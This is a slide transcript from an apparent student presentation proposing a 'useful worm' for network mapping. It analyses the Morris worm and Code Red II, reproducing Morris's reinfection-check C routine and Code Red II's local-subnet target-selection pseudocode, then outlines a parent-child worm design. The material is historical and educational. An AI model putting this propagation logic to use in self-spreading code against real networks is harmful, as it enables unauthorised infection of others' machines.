the worm works for you matt weaver cs591. introduction the shockwave rider parc town crier vampire
Post on 20-Dec-2015
214 views
TRANSCRIPT
The Worm Works For You
Matt Weaver
CS591
Introduction
The Shockwave RiderPARC
Town Crier Vampire
Goal
Use a worm to measure bandwidth and map a network.
Analyze classic worms. Morris Code Red
Determine the algorithm and architecture of a “useful worm”
Morris Mistake
Listen on a port: failure leads to infection.Machines were reinfected.
Morris checkother() /* 0x57d0 */ { int s, l8, l12, l16, optval; struct sockaddr_in sin; /* 16 bytes */ optval = 1; if ((random() % 7) == 3) return; /* 612 */ s = socket(AF_INET, SOCK_STREAM, 0); if (s < 0) return; /* Make a socket to the localhost, using a link-time specific port */ bzero(&sin, sizeof(sin)); /* 16 */ sin.sin_family = AF_INET; sin.sin_addr.s_addr = inet_addr(XS("127.0.0.1")); /* <other_fd+4> */ sin.sin_port = 0x00005b3d; /* ??? */ if (connect(s, &sin, sizeof(sin)) < 0) { close(s); } else { l8 = MAGIC_2; /* Magic number??? */ if (write(s, &l8, sizeof(l8)) != sizeof(l8)) { close(s); return; } l8 = 0; if (xread(s, &l8, sizeof(l8), 5*60) != sizeof(l8)) { close(s); return; } if (l8 != MAGIC_1) { close(s); return; }
l12 = random()/8; if (write(s, &l12, sizeof(l12)) != sizeof(l12)) { close(s); return; }
if (xread(s, &l16, sizeof(l16), 10) != sizeof(l16)) { close(s); return; }
if (!((l12+l16) % 2)) pleasequit++; close(s); } sleep(5); s = socket(AF_INET, SOCK_STREAM, 0); if (s < 0) return; /* Set the socket so that the address may be reused */ setsockopt(s, SOL_SOCKET, SO_REUSEADDR, &optval, sizeof(optval)); if (bind(s, &sin, sizeof(sin)) < 0) { close(s); return; } listen(s, 10); other_fd = s; return; }
Code Red II
Mountain DewCode Red utilized a clever distribution
scheme: not just the random IP trick.
Code Red II (Continued)
mtable[] = { 0xFFFFFFFF // go anywhere 0xFFFFFF00 // stay in class A 0xFFFFFF00 // stay in class A 0xFFFFFF00 // stay in class A 0xFFFFFF00 // stay in class A 0xFFFF0000 // stay in class B 0xFFFF0000 // stay in class B 0xFFFF0000 }; // stay in class B # start with a random number that will be our new IP address. # I presume the random number generator is "random enough". newip = random(); # zero the UPPER octets of the random IP, which means that the # random number won't participate in the class A or class B # address mask = mtable[ random() & 0x7 ]; // locate a mask newip &= mask; // throw away rightmost bits # flip the mask around to operate on LOWER octets mask = ~mask; // flip the mask around myip = LOCAL_IP & mask; // throw away leftmost bits # newip contains the upper bits # myip contains the lower bits # join them: newip |= myip; if (newip starts with 127) try again // localhost if (newip starts with 224) try again // multicast if (newip matches LOCAL_IP) try again Connect to "newip" and try to infect
A New Worm
Root
Target
Target
Target
Target
Network
Logic
Write a text file (C on Win ~ on Unix)
Talk to parent. Find next machine. Infect next. Talk to parent. Timed death. Forced death (success).
Parent Child Next Target
Concerns
Running amok/re-infection.Termination
The Root Machine
Compiles UDP payload information from child instances.
Maps network.Dynamically generate viral payload
(binary).Provide control values.
Conclusion
Master’s Project: get it working safely.
Sources
Aleph One. “Smashing the Stack for Fun and Profit”. Phrack 49.
CERT. http://www.cert.org/ Eren, Sinan. “Smashing the Kernel Stack for Fun and
Profit.” Phrack 60. Erickson, Jon. Hacking: The Art of Exploitation. No
Startch Press, 2003. Morris, Robert. Morris Worm Source Code.
http://www.foo.be/docs-free/morris-worm/worm/ Wikipedia, “Computer Worm”.
http://en.wikipedia.org/wiki/Computer_worm Wiedl, Steve. Unix Wiz. http://www.unixwiz.net/